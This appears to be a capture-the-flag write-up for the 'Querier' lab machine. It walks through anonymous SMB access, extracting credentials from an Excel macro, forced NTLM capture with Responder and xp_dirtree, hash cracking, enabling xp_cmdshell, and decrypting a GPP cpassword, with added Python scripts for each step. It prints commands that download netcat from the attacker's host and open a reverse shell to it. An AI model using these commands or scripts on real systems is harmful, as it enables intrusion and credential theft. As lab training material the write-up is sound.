Summary
This was a great machine. An insecurely shared file contained credentials for a SQL Server connection and a low-privileged database login. From there we went for the classic xp_cmdshell, but that login lacked the permissions to enable it, so we used Responder together with the xp_dirtree extended stored procedure to force the SQL Server service account to authenticate to a rogue SMB server and captured its NetNTLMv2 response. Cracking it gave us a login that could enable xp_cmdshell, which provided a reverse shell and our initial foothold. Enumeration with winPEAS and PowerUp flagged cached Group Policy Preferences history, where a Groups.xml containing an AES-encrypted cpassword gave us the Administrator password once decrypted.
Processes/Techniques
Anonymous file login
File forensics
Excel macro extraction
xp_dirtree forced SMB authentication (xp_cmdshell permission bypass)
SQL xp_cmdshell
GPO history enumeration
Reverse shell
Tools used
Impacket mssqlclient
Impacket psexec
Binwalk
winPEAS
PowerUp
Hashcat
gpp-decrypt
Nishang
Impacket smbserver
Python http.server
Wget
Responder
hash-identifier
References
Enumeration
We start with a quick port scan to get a snapshot of what we are working with. The open ports belong to an SMB file share and a SQL Server instance; there is no web port, so the attack surface is SQL, the file share, or both.
Taking the enumeration further, we scan the target with the nmap default scripts (-sC) and service/version detection (-sV).
This gives us the host and domain FQDNs and the SQL Server version.
File share enumeration
Let's jump into file share enumeration with smbclient, the Samba client that connects to SMB shares from a Linux host. Listing shares with a null session:
smbclient -N -L //10.129.1.147
We are first shown the default hidden administrative shares (the $-suffixed ones), which are unlikely to reveal anything or be readable anonymously. The final share, Reports, is not a default share name, so its permissions were set by whoever created it rather than by Windows.
Connecting to the share with the classic anonymous login, we see the file 'Currency Volume Reports.xlsm'.
We immediately try to download it with the classic mget and get commands, and neither works. Listing the available commands shows mget is there, and a closer look at its error message shows it was looking for a file named 'Currency': the file name was being split on its spaces.
Single quotes around the name do not help; double quotes do, and the file downloads.
File Forensics
Because 'Currency Volume Reports.xlsm' stuck out like a sore thumb, I went into file forensics right away to understand its purpose in the lab. The file command identifies it as an Excel 2007+ workbook, and the .xlsm extension specifically means a macro-enabled workbook. We could open it in Excel, but rather than run an unknown macro I checked it for embedded content instead.
Running binwalk immediately reveals that content: a modern Office document is an OOXML package, i.e. a ZIP archive, and binwalk extracts its parts.
Among the extracted files is vbaProject.bin, the compiled VBA macro project, which we want to investigate right away.
Running cat on it (strings would be cleaner) produces a lot of output, but buried in it is a database connection string with the pieces we need:
DB = volume
Uid = reporting
Pwd = PcwTWTHRwryjc$c6
Server=Querier
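As an added example (not code from the original write-up), the following Python script does what binwalk plus cat did above, but by parsing the workbook directly: an .xlsm is an OOXML ZIP package, the compiled VBA project lives at xl/vbaProject.bin, and string literals inside it, connection strings included, are readable without decompressing the macro source. The workbook it scans is constructed inside the script around the connection-string values recovered above; the exact connection-string layout, the CONN_KEYS list and the function names are assumptions of the example.

```python
"""Extract the VBA project from a macro-enabled workbook and scan it for
connection-string credentials.

Added example, not the write-up's code. The workbook built by
build_sample_xlsm() is a constructed stand-in for the real file.
"""
import io
import re
import zipfile

# Keys that appear in ODBC/OLEDB connection strings and carry secrets.
CONN_KEYS = ("Server", "Database", "Uid", "Pwd", "User ID", "Password")
# key '=' value, value running to ';' / NUL / quote.
CONN_RE = re.compile(
    r"(?i)\b(" + "|".join(re.escape(k) for k in CONN_KEYS) + r")\s*=\s*([^;\x00\"]+)"
)


def extract_vba_project(xlsm_bytes: bytes):
    """Return xl/vbaProject.bin from the package, or None if it has no macros."""
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as zf:
        if "xl/vbaProject.bin" not in zf.namelist():
            return None
        return zf.read("xl/vbaProject.bin")


def printable_strings(blob: bytes, min_len: int = 6):
    """Yield ASCII and UTF-16LE runs of at least min_len chars (like `strings -e l`)."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob):
        yield m.group().decode("ascii")
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, blob):
        yield m.group().decode("utf-16-le")


def find_credentials(blob: bytes) -> dict:
    """Collect connection-string key/value pairs found anywhere in the blob."""
    found = {}
    for s in printable_strings(blob):
        for key, val in CONN_RE.findall(s):
            found.setdefault(key.lower(), val.strip())   # first hit wins
    return found


def build_sample_xlsm() -> bytes:
    """Constructed stand-in for 'Currency Volume Reports.xlsm' (not the real file)."""
    conn = (b"Driver={SQL Server};Server=Querier;Trusted_Connection=no;"
            b"Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6;")
    # OLE2 magic, some filler, then the literal as a VBA module would store it.
    vba = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24 + conn + b"\x00" * 16
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/vbaProject.bin", vba)
    return buf.getvalue()


if __name__ == "__main__":
    project = extract_vba_project(build_sample_xlsm())
    for key, value in sorted(find_credentials(project).items()):
        print(f"{key} = {value}")
```

On a real file, replace build_sample_xlsm() with open(path, "rb").read(); for the full macro source (not just literals) use oletools' olevba, which decompresses the VBA streams.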
SQL Connection
From here we pivot to the Impacket suite and use mssqlclient to make the initial connection with our newly found credentials.
python3 mssqlclient.py -windows-auth reporting:PcwTWTHRwryjc$c6@10.129.1.147
This kept erroring out. The cause is the shell, not the tool: in an unquoted bash argument $c6 is expanded as a (empty) shell variable, so the password actually sent was truncated. Escaping the $ (or single-quoting the whole target) fixes it.
python3 mssqlclient.py -windows-auth reporting:PcwTWTHRwryjc\$c6@10.129.1.147
xp_cmdshell
xp_cmdshell literally spawns a Windows command shell and executes the string it is given as a command. It is disabled by default and normally locked down, but it is a common CTF target.
Microsoft's guide to it is below. Unfortunately it is not that easy: the reporting login does not have the permissions needed to run xp_cmdshell.
https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15
Researching the permission error led me to the instructions for enabling xp_cmdshell with sp_configure. Note that sp_configure itself requires the ALTER SETTINGS server permission (held by the sysadmin and serveradmin roles), so this only helps once we hold a privileged login.
The steps are shown below:
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
Forced SMB authentication (xp_dirtree)
Reading the forums it became clear that while permissions are routinely deployed to protect xp_cmdshell, there are in fact many ways to get around such basic restrictions. Trustwave published a good article on this (linked below). I tried many of the techniques; the one that finally worked is often called a man-in-the-middle but is really forced authentication: the xp_dirtree extended stored procedure lists a directory, and when it is given a UNC path on our host, the SQL Server service account connects to our rogue SMB server and authenticates with NTLM, so Responder captures its NetNTLMv2 response. xp_dirtree is executable by any login by default, which is why it works where xp_cmdshell did not.
Reference: xp_cmdshell bypass techniques
Reference: actual use of the command
So I started Responder on the VPN interface and, from the SQL session, pointed xp_dirtree at a UNC path on our host. The capture came through immediately:
[SMB] NTLMv2-SSP Client : 10.129.1.147
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:0e22bb333ed6c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
[*] Skipping previously captured hash for QUERIER\mssql-svc
Can't crack the hash
The hash would not crack when I copied and pasted it from the terminal into a file: a NetNTLMv2 line is long (the trailing blob is hundreds of hex characters) and copying it from the screen wrapped and mangled it. Use the file Responder writes itself instead, /usr/share/responder/logs/SMB-NTLMv2-SSP-10.129.1.147.txt, which holds each capture on one line in the user::domain:challenge:ntproofstr:blob format that hashcat -m 5600 expects.
└─$ hashcat -m 5600 SMB-NTLMv2-SSP-10.129.1.147.txt ../../../../usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-10750H CPU @ 2.60GHz, 1423/1487 MB (512 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 3 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 64 MB
Dictionary cache built:
* Filename..: ../../../../usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs
MSSQL-SVC::QUERIER:0e22bb333ed6c738:de7f38f1ddf8dd5fba04a659336a3822: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:corporate568
MSSQL-SVC::QUERIER:6bb09e5dda6a6844:5d8db413486b66f641195d5199db73bd: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:corporate568
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: SMB-NTLMv2-SSP-10.129.1.147.txt
Time.Started.....: Wed Oct 13 03:36:29 2021 (13 secs)
Time.Estimated...: Wed Oct 13 03:36:42 2021 (0 secs)
Guess.Base.......: File (../../../../usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1313.0 kH/s (1.39ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests, 2/2 (100.00%) Salts
Progress.........: 17920000/28688770 (62.46%)
Rejected.........: 0/17920000 (0.00%)
Restore.Point....: 8957952/14344385 (62.45%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1
Candidates.#1....: correita.54 -> cornbread3
Started: Wed Oct 13 03:36:06 2021
Stopped: Wed Oct 13 03:36:44 2021
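To make the structure of that Responder line concrete, here is an added Python example (not the write-up's code) that re-implements the check hashcat performs in mode 5600: NT hash = MD4(UTF-16LE password), NTLMv2 key = HMAC-MD5(NT hash, UPPER(user) + domain), NTProofStr = HMAC-MD5(key, server challenge + blob); a candidate password is correct when its computed NTProofStr matches the captured one. The sample line is constructed for the example from the username, domain and server challenge shown above; the blob and the candidate wordlist are made up. MD4 is implemented in pure Python because current OpenSSL builds remove it from hashlib.

```python
"""Verify and brute-force a NetNTLMv2 capture (what hashcat -m 5600 checks).

Added example, not the write-up's code. SAMPLE_LINE is constructed here;
real lines come from Responder's logs directory.
"""
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, needed for the NT hash."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xffffffff
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476]
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5a827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ed9eba1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        r = h[:]
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                j = (-i) % 4   # register updated this step: a, d, c, b, a, ...
                r[j] = rotl((r[j] + fn(r[(j + 1) % 4], r[(j + 2) % 4], r[(j + 3) % 4])
                             + X[idx] + k) & 0xffffffff, shifts[i % 4])
        h = [(a + b) & 0xffffffff for a, b in zip(h, r)]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr for the given password; the domain is used as captured, user upper-cased."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, challenge + blob, hashlib.md5).digest()


def parse_responder_line(line: str) -> dict:
    """user::domain:serverchallenge:ntproofstr:blob (the hashcat 5600 format)."""
    user, _, rest = line.strip().partition("::")
    domain, challenge, proof, blob = rest.split(":", 3)
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def crack(line: str, candidates):
    """Return the first candidate whose NTProofStr matches the capture, else None."""
    h = parse_responder_line(line)
    for pw in candidates:
        if hmac.compare_digest(ntlmv2_proof(pw, h["user"], h["domain"], h["challenge"], h["blob"]), h["proof"]):
            return pw
    return None


def make_sample_line(password="corporate568", user="mssql-svc", domain="QUERIER") -> str:
    """Constructed capture: challenge from the write-up, blob made up (AV pair = domain)."""
    challenge = bytes.fromhex("0e22bb333ed6c738")
    blob = bytes.fromhex("0101000000000000" + "00" * 8 + "0123456789abcdef" + "00000000"
                         + "0200" + "0e00" + domain.encode("utf-16-le").hex() + "0000000000000000")
    proof = ntlmv2_proof(password, user, domain, challenge, blob)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


SAMPLE_LINE = make_sample_line()

if __name__ == "__main__":
    print(crack(SAMPLE_LINE, ["Password1", "corporate568", "summer2021"]))
```

This also shows why a truncated paste fails: every byte of the blob goes into the final HMAC, so a line cut short can never verify, however good the wordlist.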
Privileged SQL login
Using the username and password I attempted to log in, but this did not work: SQL Server replied that the login is from an untrusted domain and cannot be used with Windows authentication. Thinking about it for a minute, I clued in that the host name likely needed to be in our /etc/hosts file so the connection would be made by name rather than by address.
mssql-svc
corporate568
After adding querier.htb to /etc/hosts, I connected using the name @querier.htb as the target and the login succeeded. (That error is what SQL Server returns when the domain in the NTLM login does not match a trusted domain; Impacket's target syntax is [domain/]user:password@host, so QUERIER/mssql-svc:corporate568@10.129.1.147 states the domain explicitly.)
From here I tested xp_cmdshell again and was still denied, as expected since it is not enabled. However, this login is the SQL Server service account and probably holds higher privileges, so going back to the Trustwave article I enabled xp_cmdshell with sp_configure. The enable succeeding confirms the login holds ALTER SETTINGS (sysadmin or serveradmin), and from there commands execute.
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
Reverse shell
File transfer of netcat with PowerShell's wget
xp_cmdshell powershell wget http://10.10.14.27:8000/nc64.exe
From here I ran nc64.exe with the arguments for a reverse shell.
xp_cmdshell nc64.exe -e cmd 10.10.14.27 6363
This did not work, and the first command is the reason: in PowerShell, wget is an alias for Invoke-WebRequest, which without -OutFile returns the response to the pipeline and writes nothing to disk, so there was no nc64.exe to run. Downloading to an explicit path with -o (short for -OutFile) and executing from that path works:
xp_cmdshell powershell wget http://10.10.14.27:8000/nc64.exe -o C:\Users\mssql-svc\Downloads\nc64.exe
xp_cmdshell C:\Users\mssql-svc\Downloads\nc64.exe -e cmd 10.10.14.27 6363
Root
From here I uploaded winPEAS.exe as usual, but it did not run, so I fell back to the .bat version. First I transferred it with
xp_cmdshell powershell wget http://10.10.14.27:8000/winPEAS.bat -o C:\Users\mssql-svc\Downloads\winPEAS.bat
and ran it with
winPEAS.bat
But wait: Juicy Potato does not work on Server 2019 and newer Windows builds, and this host is Server 2019, so that shortcut is out.
What winPEAS did surface was a cached Group Policy Preferences file containing a password. On seeing it, I elevated the shell to PowerShell by simply typing powershell, retrieved the file and took the cpassword value from the XML. Note that this is an encrypted password, not a hash, so it is decrypted rather than cracked or passed.
C:\Users\All Users\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
(C:\Users\All Users and C:\Documents and Settings\All Users\Application Data are both junctions to C:\ProgramData, so the same file appears under either path.)
PS C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups> type Groups.xml
<?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups>
The cpassword attribute is the value we need:
CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ
Researching Group Policy Preferences passwords led me to a broader understanding of the weakness (cpassword is AES-encrypted with a key Microsoft published in its own documentation, so anyone who can read the XML can reverse it) and to the gpp-decrypt tool, which gives us the Administrator password.
https://www.kali.org/tools/gpp-decrypt/
MyUnclesAreMarioAndLuigi!!1!
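What gpp-decrypt does, as an added Python example (not the write-up's or the tool's code): cpassword is the AES-256-CBC ciphertext of the UTF-16LE password, PKCS#7-padded, under the static key Microsoft published in the MS-GPPREF specification, with a zero IV and the base64 '=' padding stripped. AES decryption is implemented in pure Python here so the script runs without third-party modules (the S-box is generated rather than typed in); the cpassword is the one from Groups.xml above, and the function names are the example's own.

```python
"""Decrypt a Group Policy Preferences cpassword (what gpp-decrypt does).

Added example, not the write-up's code. Pure-Python AES-256-CBC decryption
plus the published GPP key; CPASSWORD is the value from this page's Groups.xml.
"""
import base64

# Static AES-256 key from MS-GPPREF ("Password Encryption").
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
CPASSWORD = "CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ"


def _xtime(a):                       # multiply by x in GF(2^8)
    a <<= 1
    return (a ^ 0x1b) & 0xff if a & 0x100 else a


def _gmul(a, b):                     # GF(2^8) multiplication
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r


def _build_sbox():                   # multiplicative inverse followed by the affine map
    sbox = []
    for x in range(256):
        inv = 0
        if x:
            inv = 1
            for _ in range(254):     # x^254 == x^-1 in GF(2^8)
                inv = _gmul(inv, x)
        s = inv ^ 0x63
        for k in range(1, 5):
            s ^= ((inv << k) | (inv >> (8 - k))) & 0xff
        sbox.append(s)
    return sbox


SBOX = _build_sbox()
INV_SBOX = [0] * 256
for _i, _v in enumerate(SBOX):
    INV_SBOX[_v] = _i


def _expand_key(key):                # AES-256 key schedule: 15 round keys of 16 bytes
    w = [list(key[i:i + 4]) for i in range(0, 32, 4)]
    rcon = 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # RotWord + SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif i % 8 == 4:
            t = [SBOX[b] for b in t]
        w.append([a ^ b for a, b in zip(w[i - 8], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(15)]


def _inv_shift_rows(s):              # state is column-major: s[r + 4*c]
    return [s[r + 4 * ((c - r) % 4)] for c in range(4) for r in range(4)]


def _inv_mix_columns(s):
    out = []
    for c in range(4):
        a = s[4 * c:4 * c + 4]
        for m in ((14, 11, 13, 9), (9, 14, 11, 13), (13, 9, 14, 11), (11, 13, 9, 14)):
            out.append(_gmul(a[0], m[0]) ^ _gmul(a[1], m[1]) ^ _gmul(a[2], m[2]) ^ _gmul(a[3], m[3]))
    return out


def aes256_decrypt_block(round_keys, block):
    """FIPS-197 inverse cipher for one 16-byte block."""
    s = [b ^ k for b, k in zip(block, round_keys[14])]
    for rnd in range(13, 0, -1):
        s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
        s = _inv_mix_columns([b ^ k for b, k in zip(s, round_keys[rnd])])
    s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
    return bytes(b ^ k for b, k in zip(s, round_keys[0]))


def aes256_cbc_decrypt(key, iv, ciphertext):
    rks, prev, out = _expand_key(key), iv, bytearray()
    for i in range(0, len(ciphertext), 16):
        blk = ciphertext[i:i + 16]
        out += bytes(p ^ q for p, q in zip(aes256_decrypt_block(rks, blk), prev))
        prev = blk
    return bytes(out)


def gpp_decrypt(cpassword: str) -> str:
    data = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))   # restore '=' padding
    plain = aes256_cbc_decrypt(GPP_KEY, bytes(16), data)                 # zero IV
    return plain[:-plain[-1]].decode("utf-16-le")                        # strip PKCS#7


if __name__ == "__main__":
    print(gpp_decrypt(CPASSWORD))
```

Nothing here is a secret that needs cracking: the key is the same on every domain, which is why Microsoft removed the ability to store passwords in GPP (MS14-025) and why any readable cpassword in SYSVOL or a client's Group Policy History is an immediate credential.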